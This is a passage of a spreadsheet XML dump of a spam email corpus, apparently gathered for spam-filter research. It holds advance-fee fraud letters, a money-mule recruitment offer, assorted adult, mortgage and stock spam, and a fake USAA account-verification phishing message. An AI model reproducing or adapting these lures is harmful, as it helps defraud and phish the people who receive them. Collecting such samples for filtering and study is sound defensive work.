we are still in service and intend to retire from service after we conclude this deal with you. I will be monitoring the whole situation here in this bank until you confirm the money in your account and ask us to come down to your country for subsequent sharing of the fund according to percentages previously indicated and further investment, either in your country or any country you advice us to invest in. \n \nAll other necessary information will be sent to you when I hear from you. I suggest you get back to me as soon as possible stating your wish in this deal.\n Yours Sincerely, Dr Usman Ibrahim Danko.\n_________________________________________________________________\nInvite your mail contacts to join your friends list with Windows Live Spaces. It's easy!\n[URL]http://spaces.live.com[/URL]</t>
  </si>
  <si>
    <t>1534</t>
  </si>
  <si>
    <t>To: nan\nFrom: mrrezaabdulla &lt;mr4rezaabdulla@walla.com&gt;\nDate: Tue, 18 Oct 2005 11:42:42 +0700</t>
  </si>
  <si>
    <t>Tue, 18 Oct 2005 11:42:42 +0700</t>
  </si>
  <si>
    <t>mrrezaabdulla &lt;mr4rezaabdulla@walla.com&gt;</t>
  </si>
  <si>
    <t>GREETINGS FROM REZA</t>
  </si>
  <si>
    <t>\nDear Friend, \n \nAs you read this, I don't want you to feel sorry for me, because, I believe everyone will die someday. My name is MR. REZA ABDULLA , a merchant in Safat, in (Kuwait) I was married with two children. My wife and two children died in a car accident six years ago. I have been diagnosed with Esophageal cancer. It has defiled all forms of medical treatment, and right now I have only about a few months to live, according to medical experts.\nI have not particularly lived my life so well, as I never really cared for anyone (not even myself) but my business. Though I am very rich, I was never generous,I was always hostile to people and only focused on my business as that was the only thing I cared for. But now I regret all this as I now know that there is more to life than just wanting to have or make all the money in the world.\nI believe when God gives me a second chance to come to this world I would live my life a different way from how I have lived it. Now that God has called me, I have willed and given most of my property and assetsto my immediate and extended family members as well as a few close friends. I want God to be merciful to me and accept my soul.So I have decided to give alms to charity organizations, as I want this to be one of the last good deeds I do on earth So far, I have distributed money to some charity organizations in the U.A.E, Algeria and Malaysia. Now that my health has deteriorated so badly, I cannot do this myself anymore. I once asked members of my family to close one of my accounts and distribute the money which I have there to charity organization in Bulgaria and Pakistan, they refused and kept the money to themselves. Hence, I do not trust them anymore, as they seem not to be contended with what I have left for them. The last of my money which no one knows of is the huge cash deposit of Ten Million Seven Hundred Thousand American dollars (U.S.$10.700,000) that I have with a finance/Security Company abroad. I will\nwant you to help me collect this deposit and dispatched it to charity organizations. I have set\naside only 20 % for you and for your time and also 5% as miscellaneous expenses. Reply me at your earliest convenience for more directives to my private email address: mr4rezaabdulla@walla.com\n \n \nGod be with you.\nRegards,\nMR. REZA ABDULLA\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>707</t>
  </si>
  <si>
    <t>To: ilist-owner@krusty.si.UM\nFrom: ilist-owner@krusty.si.UM\nDate: Tue, 18 May 2004 17:16:56 -0400</t>
  </si>
  <si>
    <t>Tue, 18 May 2004 17:16:56 -0400</t>
  </si>
  <si>
    <t>ilist-owner@krusty.si.UM</t>
  </si>
  <si>
    <t>Ilist post from drallo_wd4@yahoo.com requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    Ilist@lists.si.UM\n    From:    drallo_wd4@yahoo.com\n    Subject: urgent response needed\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://lists.si.UM[/URL]\n        \nto approve or deny the request.\n</t>
  </si>
  <si>
    <t>2355</t>
  </si>
  <si>
    <t>To: nan\nFrom: yanlee &lt;mr_yan_chanlee@yahoo.com.hk&gt;\nDate: Tue, 18 Jul 2006 19:25:30 -0500</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2006 19:25:30 -0500</t>
  </si>
  <si>
    <t>yanlee &lt;mr_yan_chanlee@yahoo.com.hk&gt;</t>
  </si>
  <si>
    <t>REPRESENTATIVE NEEDED</t>
  </si>
  <si>
    <t>\n\n6th floor,\nGuangxing Building, \n466th Nanshan Road,Xiamen 361006,\nChina.\n \nDear madam/sir,\nI am Mr Yan Chan  Lee,\nManaging Director of APEX STONE.\n    We are group or business men ,We manufacture and export our finnished product into the Us and Canada,product such \nas,Apexstone Amoy Marble &amp; Granite,is a Xiamen,China based manufacturer \nand exporter of worldwide marble , worldwide granite , china granite, \nchina marble , sand stone, travertine, limestone,We are searching for a representative that will help us in collection of \nfunds from our customer and making payment for our companY due to language and distans problem.\nSo we came up with the ideal of contacting you to be our representative \nin the Canada/America and Europe,where we have so many customer that \nare ordering for goods.\nSubject to your satisfaction, you will be given the\nopportunity to negotiate your mode of which we will pay for your\nservices as our  representative. Please\nif you are\ninterested forward to us your phone number/fax and\nyour full contact addresses. \nThanks in advance.\nManaging Director.\nYan Chan  Lee.\nPlease for the sake of confidentiality i would prefare you to reply me\nvia my private email account;yanlee_chan@yahoo.co.uk \n\n___________________________________________________________________________\nMail sent from WebMail service at [URL]http://www.njbfaa.org[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.njbfaa.org</t>
  </si>
  <si>
    <t>4416</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Adult Club Services &lt;dyporn@post.com&gt;\nDate: Tue, 17 Sep 2002 20:09:29 -0700</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 20:09:29 -0700</t>
  </si>
  <si>
    <t>Adult Club Services &lt;dyporn@post.com&gt;</t>
  </si>
  <si>
    <t>Re: zzzz@spamassassin.taint.org</t>
  </si>
  <si>
    <t>New Account For: zzzz@spamassassin.taint.org\n##################################################\n#                                                #\n#          Free XXX Links .org is a              #\n#          non-profit organization               #\n#                                                #\n#           Offering the best in                 #\n#       adult entertainment for free.            #\n#                                                #\n##################################################\n\n&gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW\n&gt;&gt;&gt;&gt;&gt;  Your User Name And Password:\n&gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org\n&gt;&gt;&gt;&gt;&gt;  Password: 818932\n\nTest it out NOW!   Adults Farm\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\nGirls and Animals Getting Freaky....FREE Lifetime Membership!!\n\n6 of the Best Adult Sites on the Internet for FREE!\n---------------------------------------\nNEWS 09/05/02\nWith just over 3.9 Million Members that signed up for FREE, Last month there were 894,457 New\nMembers. Are you one of them yet???\n---------------------------------------\nOur Membership FAQ\n\nQ. Why are you offering free access to 6 adult membership sites for\nfree?\nA. I have advertisers that pay me for ad space so you don't have to pay\nfor membership.\n\nQ. Is it true my membership is for life?\nA. Absolutely you'll never have to pay a cent the advertisers do.\n\nQ. Can I give my account to my friends and family?\nA. Yes, as long they are over the age of 18.\n\nQ. Do I have to sign up for all 6 membership sites?\nA. No just one to get access to all of them.\n\nQ. How do I get started?\nA. Click on one of the following links below to become a member.\n\n- These are multi million dollar operations with policies and rules.\n- Fill in the required info and they won't charge you for the Free pass!\n- If you don't believe us, just read their terms and conditions.\n\n---------------------------\n\n# 6. &gt; XXX Adults Farm\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\nGirls and Animals Getting Freaky....FREE Lifetime Membership!!\n\n# 5. &gt; Sexy Celebes Porn\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\nThousands Of XXX Celebes doing it...FREE Lifetime Membership!!\n\n# 4. &gt; Play House Porn\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\nLive Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!\n\n# 3. &gt; Asian Sex Fantasies\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\nJapanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!\n\n# 2. &gt; Lesbian Lace\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\nGirls and Girls Getting Freaky! ...FREE Lifetime Membership!!\n\n# 1. &gt; New! just added today: Mage Porn Site\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL]\n950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!\n--------------------------\n\nJennifer Simpson, Miami, FL\nYour FREE lifetime membership has entertained my boyffriend and I for\nthe last two years!  Your Adult Sites are the best on the net!\n\nJoe Morgan Manhattan, NY\nYour live sex shows and live sex cams are unbelievable. The best part\nabout your porn sites, is that they're absolutely FREE!\n\n--------------------------\n\n\n\n\n\n\n\n\n\n\n\n\nRemoval Instructions:\nYou have received this advertisement because you have opted in to receive free adult internet\noffers and specials through our affiliated websites. If you do not wish to receive further emails\nor have received the email in error you may opt-out of our database here\n[URL]http://rd.yahoo.com[/URL]*[URL]http://80.71.71.88[/URL] . Please allow 24 hours for removal.\n\nmdnfhmobawljhlqtotlhpikemcywuc</t>
  </si>
  <si>
    <t>http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88 http://rd.yahoo.com http://80.71.71.88</t>
  </si>
  <si>
    <t>4414</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - GE Financial" &lt;gef@insiq.us&gt;\nDate: Tue, 17 Sep 2002 19:11:21 -0400</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 19:11:21 -0400</t>
  </si>
  <si>
    <t>"IQ - GE Financial" &lt;gef@insiq.us&gt;</t>
  </si>
  <si>
    <t>The Best Just Got Better</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_000D_01C25E69.A7BD8E30 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Any way you slice it...GE Lifetime Protector is a cut above!   Underwritten by General Electric Capital Assurance Company and First Colony Life Insurance Company  GE Lifetime Protector universal life insurance cooks the competition with competitive premiums	    Male, Age 55, Best, $500,000 Face Amount, Annual Premiums	  GE Lifetime ProtectorSM	 Lifetime Premium1 $6,252 	CSV=$1 @ Age 1002 $5,356	 CSV=Face Amt @ Age 1002 $5,841 	 Product J	 $6,365	 $7,699	 $7,970	  Product I	 $6,531	 $6,809	 $7,327	  Product L	 $6,348	 $6,250	 $6,630	  Product S	 $6,538	 $5,709	 $6,550	  Product U	 $8,950	 $5,827	 $6,185	  Product T	 $7,581	 $6,729	 $7,372	  Product M	 $7,637	 $6,711	 $6,916	  Product G	 $7,044	 $5,529	 $6,207	  Source: Industry Market research conducted and compiled by GE Financial, August 2002.    GE Lifetime ProtectorSM is subject to the terms, issue limitations and conditions of Policy Form Nos. UL GE02 et al for GE Capital Assurance and ULFCL02 et al for First Colony Life, which include exclusion periods for death by suicide. GE Lifetime ProtectorSM is not available in all states.  1Premium that guarantees coverage for the life of the insured according to the companies' provisions. Companies refer to premium by different names and the conditions for the guarantee will vary from company to company. For GE Lifetime ProtectorSM, this refers to the designated premium requirement: subject to the policy provisions, policy remains in force as long as the sum of the premiums paid, less the reduction in policy value for all partial withdrawals, equals or exceeds the cumulative total of the designated monthly premiums from the policy date to the end of the current policy month. 2Premiums calculated assuming each company's current crediting rate and charges. Each column represents the premium required annually to age 100 to achieve target cash surrender value stated in the column heading.  	  	Underwritten by General Electric Capital Assurance Company First Colony Life Insurance Company Lynchburg, VA Members of the GE Financial family of companies  Click Here for GE Lifetime Protector(sm) Information and Quotes from a BRAMCO Agency!  	  We don't want anyone to receive our mailings who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL]   Legal Notice   ------=_NextPart_000_000D_01C25E69.A7BD8E30 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable The Best Just Got Better =20 =20      =20            			  			 =20            =20                                    Male, Age 55, Best, $500,000 Face Amount, Annual = Premiums =20                 GE Lifetime ProtectorSM Lifetime                   Premium1 $6,252=20                  CSV=3D$1                   @ Age 1002 $5,356 CSV=3DFace Amt                   @ Age 1002 $5,841=20                  =20                 Product = J $6,365 $7,699 $7,970 =20                 Product I $6,531 $6,809 $7,327 =20                 Product L $6,348 $6,250 $6,630 =20                 Product S $6,538 $5,709 $6,550 =20                 Product U $8,950 $5,827 $6,185 =20                 Product T $7,581 $6,729 $7,372 =20                 Product M $7,637 $6,711 $6,916 =20                 Product G $7,044 $5,529 $6,207 Source: Industry Market = research conducted and compiled by GE Financial, August 2002. = 			 =20             GE Lifetime = ProtectorSM=20             is subject to the terms, issue limitations and conditions of = Policy=20             Form Nos. UL GE02 et al for GE Capital Assurance and ULFCL02 = et al=20             for First Colony Life, which include exclusion periods for = death by=20             suicide. GE Lifetime ProtectorSM is not available = in all=20             states.             1Premium that guarantees coverage for the life = of the insured according to the companies' provisions.               Companies refer to premium by different names and the = conditions=20               for the guarantee will vary from company to company. For = GE Lifetime=20               ProtectorSM, this refers to the designated = premium requirement:=20               subject to the policy provisions, policy remains in force = as long=20               as the sum of the premiums paid, less the reduction in = policy value=20               for all partial withdrawals, equals or exceeds the = cumulative total=20               of the designated monthly premiums from the policy date to = the end=20               of the current policy month. 2Premiums calculated=20               assuming each company's current crediting rate and = charges. Each=20               column represents the premium required annually to age 100 = to achieve=20               target cash surrender value stated in the column = heading. =20            =20            =20             Underwritten by               General Electric Capital Assurance Company               First Colony Life Insurance Company Lynchburg, = VA               Members of the GE Financial family of = companies =20            =20      We don't = want anyone to receive our mailings who does not=20 			wish to receive them. This is a professional communication=20 			sent to insurance professionals. To be removed from this mailing=20 			list, DO NOT REPLY to this message. Instead, go here: =20 			[URL]http://www.insuranceiq.com[/URL] Legal Notice =20 ------=_NextPart_000_000D_01C25E69.A7BD8E30--</t>
  </si>
  <si>
    <t>4408</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "COL. MICHAEL BUNDU" &lt;mikbundu@rediffmail.com&gt;\nDate: Tue, 17 Sep 2002 15:30:45 +0100</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 15:30:45 +0100</t>
  </si>
  <si>
    <t>"COL. MICHAEL BUNDU" &lt;mikbundu@rediffmail.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] ASSISTANCE</t>
  </si>
  <si>
    <t>FROM: COL. MICHAEL BUNDU. \nDEMOCRATIC REPUBLIC OF CONGO. \nTel No: Your country Intl. access code +8821652098236\nemail : mikebundu@rediffmail.com\nDear Sir/Madam\n\n\nSEEKING YOUR IMMEDIATE ASSISTANCE. \n\nPlease permit me to make your acquaintance in so informal a manner. This\nis necessitated by my urgent need to reach a \ndependable and trust worthy foreign partner. This request may seem strange\nand unsolicited but I crave your indulgence \nand pray that you view it seriously. My name is COL. MICHAEL BUNDU of the\nDemocratic Republic of Congo and one of \nthe close aides to the former President of the Democratic Republic of\nCongo LAURENT KABILA of blessed memory, may \nhis soul rest in peace. \n\nDue to the military campaign of LAURENT KABILA to force out the rebels in\nmy country, I and some of my colleagues were \ninstructed by Late President Kabila to go abroad to purchase arms and\nammunition worth of Twenty Million, Five Hundred \nThousand United States Dollars only (US$20,500,000.00) to fight the rebel\ngroup. We were then given this money privately \nby the then President, LAURENT KABILA, without the knowledge of other\nCabinet Members. But when President Kabila \nwas killed in a bloody shoot-out by one of his bodyguards a day before we\nwere schedule to travel out of Congo, We \nimmediately decided to put the funds into a private security company here\nin Congo for safe keeping. The security of the \nsaid amount is presently being threatened here following the arrest and\nseizure of properties of Col. Rasheidi Karesava \n(One of the aides to Laurent Kabila) a tribesman, and some other Military\nPersonnel from our same tribe, by the new \nPresident of the Democratic Republic of Congo, the son of late President\nLaurent Kabila, Joseph Kabila. \n\nIn view of this, we need a reliable and trustworthy foreign partner who\ncan assist us to move this money out of my country \nas the beneficiary. \nWE have sufficient ''CONTACTS'' here to move the fund under Diplomatic\nCover to a security company in Europe in your \nname. This is to ensure that the Diplomatic Baggage is marked\n''CONFIDENTIAL'' and it \nwill not pass through normal custom/airport screening and clearance. \n\nOur inability to move this money out of Congo all this while stems from\nour lack of trust of our supposed good friends \n(western countries) who suddenly became hostile to those of us who worked\nwith the late President Kabila, immediately \nafter his son took office. Though we have neither seen nor met each other,\nthe information We gathered from an associate \nwho has worked in your country has encouraged and convinced us that with\nyour sincere assistance, this transaction will \nbe properly handled with modesty and honesty to a huge success within two\nweeks. The said money is a state fund and \ntherefore requires a total confidentiality. \n\nWe would please need you to stand on our behalf as the beneficiary of this\nfund in Europe. This is because we are under \nrestricted movement and watch and hence we want to be very careful in\norder not to lose this fund which we have worked \nso hard for. Thus, if you are willing to assist us to move this fund out\nof Congo, you can contact me through my email \naddresses, Tel/Fax nos. above with your telephone, fax number and personal\ninformation to enable us discuss the \nmodalities and what will be your share (percentage) for assisting us.\n\nPlease note that There are no RISKS involved in this Deal as everyone's\nSecurity is Guaranteed if we follow the required \nguidelines. I will hence furnish you with further details of this Deal as\nsoon as I am assured of your Sincere interest to assist \nus. \n\nI must use this opportunity and medium to implore you to exercise the\nutmost indulgence to keep this matter extraordinarily \nconfidential, Whatever your decision, while I await your prompt response.\nThank you and God Bless. \nBest Regards \n\n\nCOL. MICHAEL BUNDU(RTD). m_bundu@rediffmail.com\n\nN\B. When you are calling my line, you dial your country Intl. access\ncode, then you dial directly, do not include my country \ncode i.e. (243). Just dial your country Intl. access code + 88216\n52098236. You can also contact me through the above \nemail addresses.\n\n\n\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4409</t>
  </si>
  <si>
    <t>To: crew_4@hotmail.com\nFrom: bralbertini21@netscape.net\nDate: Tue, 17 Sep 2002 13:28:38 -0400</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 13:28:38 -0400</t>
  </si>
  <si>
    <t>bralbertini21@netscape.net</t>
  </si>
  <si>
    <t>crew_4@hotmail.com</t>
  </si>
  <si>
    <t>Don't get caught by rising interest rates.</t>
  </si>
  <si>
    <t>Opportunity is knocking. Why? Because mortgage rates are rising. As a National Lender, not a broker, we can guarantee you the lowest possible rate on your home loan. Rates may well never be this low again. This is your chance to secure a better future. You could literally save enough money to buy that new car you've been wanting or to take that special vacation. Why pay more than you have to pay? We can guarantee you the best rate and the best deal possible for you. But only if you act now. This is a free service. No fees of any kind.   You can easily determine if we can help you in just a few short minutes. We only provide information in terms so simple that anyone can understand them. We promise that you won't need an attorney to see the savings.   We offer both first and second home loans and we will be happy to show you why your current loan is the best for you. 0r why you should replace it. Once again, there's no risk for you. None at all. Take two minutes and use the link(s) below that works for you. Let us show you how to get more for yourself and your family. Don't let opportunity pass you by. Take action now. Click_Here [URL]http://209.202.221.16[/URL]⌖=[URL]http://211.167.74.101[/URL]   Sincerely, Chalres M. Gillette MortCorp, LLC olhfilghxvuyfkfqbviqgacyenuuufpyswymlajxucqhpojagplujpmovuiaphwlqkkstgipemliwuugqptjukjklbjlgxqmuogtiwhhdlhjhkbucvbyqvgfp __________________________________________________________________ The NEW Netscape 7.0 browser is now available. Upgrade now! [URL]http://channels.netscape.com[/URL]  Get your own FREE, personal Netscape Mail account today at [URL]http://webmail.netscape.com[/URL]</t>
  </si>
  <si>
    <t>http://209.202.221.16 http://211.167.74.101 http://channels.netscape.com http://webmail.netscape.com</t>
  </si>
  <si>
    <t>4410</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: "WALL STREET BULLETIN..47331" &lt;Subscriber_Services78056@att.net&gt;\nDate: Tue, 17 Sep 2002 12:47:46 -0500</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 12:47:46 -0500</t>
  </si>
  <si>
    <t>"WALL STREET BULLETIN..47331" &lt;Subscriber_Services78056@att.net&gt;</t>
  </si>
  <si>
    <t>New Stock Pick: BBAN - Last Pick UP 309%.......................................... gsg</t>
  </si>
  <si>
    <t>\n\nVolume 8, Issue 35 - Sept. 2002\n\n**CLICK HERE**\n\n![]([URL]http://www.globalcybercollective.com[/URL]\n\n\n\n\n\nI no longer wish to receive your newsletter **click here**\n\nurfrdemubblkunmdbyh\n\n</t>
  </si>
  <si>
    <t>4407</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Great Offers &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Tue, 17 Sep 2002 10:01:59 -0500</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 10:01:59 -0500</t>
  </si>
  <si>
    <t>Best Long Distance On the Net - 3.9 Cents With No Monthly Fees</t>
  </si>
  <si>
    <t>![]([URL]http://admanmail.com[/URL] |\n![]([URL]http://admanmail.com[/URL]  \n---|---  \n![]([URL]http://admanmail.com[/URL] |\n![]([URL]http://admanmail.com[/URL]  \n![]([URL]http://admanmail.com[/URL] |\n![]([URL]http://admanmail.com[/URL]  \n![]([URL]http://admanmail.com[/URL] |\n![]([URL]http://admanmail.com[/URL]  \n![T]([URL]http://theadmanager.com[/URL]\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admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com http://admanmail.com http://theadmanager.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4406</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: CopyYourDVD &lt;atomica2020@hotmail.com&gt;\nDate: Tue, 17 Sep 2002 09:15:32 PST</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 09:15:32 PST</t>
  </si>
  <si>
    <t>CopyYourDVD &lt;atomica2020@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Friend, Copy ANY DVD or Playstation Game with this software......</t>
  </si>
  <si>
    <t>--------------103227703017104 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Friend,Now you can copy DVD's and Games [URL]http://www.terra.es[/URL] BACKUP DVD VIDEO's WITH YOUR CD-R BURNER With 321 studio's software, you can now copy any DVD and Playstation Game.  Never buy another  backup DVD movie again.  Just copy it! This is the first time this software is being made available to the public. All the software you need  to burn your own DVD Video, is included in 321 Studio's  software package DVD Copy Plus!  The movies will play  in a standard DVD player. With detailed, easy to follow,  step-by-step instructions, you can BURN your own DVD  Video using nothing more than your DVD-ROM  and CD-R drives. Purchase a copy! Click below. [URL]http://www.terra.es[/URL] Order today and receive! *Step by Step Interactive Instructions *All Software Tools Included On CD *No DVD Burner Required *FREE Live Technical Support *30 Day Risk Free Trial Available With DVD Copy Plus you can backup Your DVD Movies with  the same 74min or 80min CD-R's you've used in the past  to create audio CD's. Our software compresses the large  DVD files on your standard DVD to VCD, SVCD, and DivX  much the same way the popular MP3 format compresses audio.   Order today and start burning [URL]http://www.terra.es[/URL] Thank You, CopymyDVD [URL]http://inglesa.net[/URL] We take your privacy very seriously and it is our policy never to send unwanted email messages. This message has been sent to zzzz@spamassassin.taint.org because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT. Please [URL]http://tilw.net[/URL] to Unsubscribe (replying to this email WILL NOT unsubscribe you).  TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8; --------------103227703017104 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Backup your DVD's With DVDCopyPlus            and PowerCDR5.0 you can copy and burn your DVD Movies Playstation  MP3s, AVIs and all              other multimedia Files Software, Music              CDs (perfect RAW data duplication) NEW! Burn to CD-R              or DVD-R Protect your            investments by backing up your CD, DVD, MP3, Data and Game collections            with burned copies that really work! Separately, DVDCopyPlus and PowerCDR5.0            are over $100 worth of software that you can purchase bundled right            now for just $49.99! THAT'S 50% OFF! MORE DETAILS ORDER NOW We take your privacy very seriously and it is our policy never to send unwanted email messages.  This message has been sent to zzzz@spamassassin.taint.org because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT.  Please Click Here to Unsubscribe  (replying to this email WILL NOT unsubscribe you).   &lt;&gt; TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8; --------------103227703017104--</t>
  </si>
  <si>
    <t>2611</t>
  </si>
  <si>
    <t>To: nan\nFrom: harrison compaore &lt;harricom0359@hotmail.com&gt;\nDate: Tue, 17 Oct 2006 13:50:35 +0000</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2006 13:50:35 +0000</t>
  </si>
  <si>
    <t>harrison compaore &lt;harricom0359@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR HARRISON COMPAORE\nBILL AND EXCHANGE MANAGER,\nBANK OF AFRICA (B.O.A)\nOUAGADOUGOU, BURKINA FASO.WEST AFRICA\n\n\nMy Dear\n\nI am Mr Harrison Compaore, the manager of bill and exchange at the foreign \nremittance department of BANK OF AFRICA (B.O.A) here in Ouagadougou, Burkina \nFaso. In my department we discovered an abandoned sum of US$39.5m dollars \n(thirty-nine million five hundred thousand US dollars) in an account that \nbelongs to one of our foreign customer (MR. ANDREAS SCHRANNER from Munich, \nGermany) who died along with his entire family in July 2000 in a plane \ncrash. for more information about the crash you can visit this site:( \n[URL]http://news.bbc.co.uk[/URL]\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsome body applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines and laws but unfortunately we learnt \nthat all his supposed next of kin or relation died alongside with him at the \nplane crash leaving nobody behind for the claim. It is therefore upon this \ndiscovery that I now decided to make this business proposal to you and \nrelease the money to you as the next of kin or relation to the deceased for \nsafety and subsequent disbursement since nobody is coming for it and we \ndon't want this money to go into the bank treasury as unclaimed bill.\n\nThe banking law and guideline here stipulates that if such money remained \nunclaimed after eight years, the money will be transferred into the bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner and a \nBurkinabe cannot stand as next of kin to a foreigner.\n\nI agree that 30% of this money will be for you as a respect to the provision \nof a foreign account , 10% will be set aside for expenses incurred during \nthe business and 60% would be for me Thereafter, I will visit your country \nfor disbursement according to the percentage indicated Therefore, to enable \nthe immediate transfer of this fund to your arranged, you must apply first \nto the bank as relation or next of kin of the deceased with a text of \napplication form that I will send to you when I hear from you, so I will \nlike you to send to me your private telephone and fax number for easy and \neffective communication and location where the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application. I will not fail to bring to your notice this transaction is \nhitch-free and that you should not entertain any atom of fear as all \nrequired arrangements have been made for the transfer. You should contact me \nimmediately as soon as you receive this letter.\n\nTrusting to hear from you immediately.\nThe manager of bill and exchange at the foreign remittance department of \nBANK OF AFRICA (B.O.A).\n\nBest Regard\nMr Harrison Compaore.\n\n_________________________________________________________________\nMSN Hotmail sur i-mode : envoyez et recevez des e-mails depuis votre \ntlphone portable ! [URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>26</t>
  </si>
  <si>
    <t>To: Recipients &lt;USAA.protectionsupport@uusaa.com&gt;\nFrom: "USAA" &lt;USAA.protectionsupport@uusaa.com&gt;\nDate: Tue, 17 Nov 2015 22:02:47 -0200</t>
  </si>
  <si>
    <t>Tue, 17 Nov 2015 22:02:47 -0200</t>
  </si>
  <si>
    <t>"USAA" &lt;USAA.protectionsupport@uusaa.com&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;USAA.protectionsupport@uusaa.com&gt;</t>
  </si>
  <si>
    <t>Your USAA Account Personal Information Update</t>
  </si>
  <si>
    <t>To ensure delivery to your inbox, please add  USAA.Web.Services@customermail.usaa.com to your address book.	  	        	     	      	      Account Verification Notice	       View Accounts |  Privacy Promise |  Contact Us	    	          	  	     	  	     	  	    	       USAA SECURITY ZONE   ONLINE    MEMBER    USAA # ending in: XXXX	    	      	     	     	    	    	     	    	          Dear Customer, For security reasons your online account has been temporarily restricted for verification, we are verifying and confirming our customers emails on our database to make sure their account has not been compromised and that they are still getting messages from usaa in order to prevent fraud and identity theft. Login here [URL]https://www.usaa.com[/URL] to complete your verification  Note: Please login your account with Mozilla Firefox Browser within 24 hours to update your account so its not permanently restricted. Thank you,  USAA   	  	         	    	  	  	     	  	  	  	     	      Please do not reply to this e-mail. To send a secure message to USAA, please  contact us.     Privacy Promise  USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288   	     	     	   USAA means United Services Automobile Association and its insurance, banking, investment and other companies. Banks Member FDIC. Investments provided by USAA Investment Management Company and USAA Financial Advisors Inc., both registered broker dealers.	  	     	      67624-1212      	    To      ensure delivery to your inbox, please add  USAA.Web.Services@customermail.usaa.com to your address book.     Account Verification Notice             View Accounts |                          Privacy Promise |                          Contact Us USAA SECURITY ZONE  ONLINE                 MEMBER                  USAA # ending in: XXXX           Dear Customer,         For security reasons your online account has been temporarily restricted for verification, we are  verifying and confirming our customers emails on our database to make sure their account has not been compromised and that they are still getting messages from usaa in  order to prevent fraud and identity theft. Login here [URL]https://www.usaa.com[/URL] to  complete your verification Note: Please login your account with Mozilla Firefox Browser within 24 hours to update your account so its not permanently restricted. Thank you,         USAA                                  Please do not reply to this e-mail. To send a secure message to USAA, please          contact us.     Privacy Promise     USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288               USAA means United Services Automobile Association and its insurance,      banking, investment and other companies. Banks Member FDIC. Investments      provided by USAA Investment Management Company and USAA Financial Advisors      Inc., both registered broker dealers.         67624-1212</t>
  </si>
  <si>
    <t>235</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr. Mike Obodoh &lt;mike.obodoh@caramail.com&gt;\nDate: Tue, 17 Jun 2003 01:21:09 +0200</t>
  </si>
  <si>
    <t>Tue, 17 Jun 2003 01:21:09 +0200</t>
  </si>
  <si>
